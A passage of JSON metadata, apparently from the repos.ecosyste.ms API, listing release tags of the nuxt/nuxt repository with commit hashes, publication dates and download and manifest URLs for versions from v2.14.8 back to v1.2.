g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.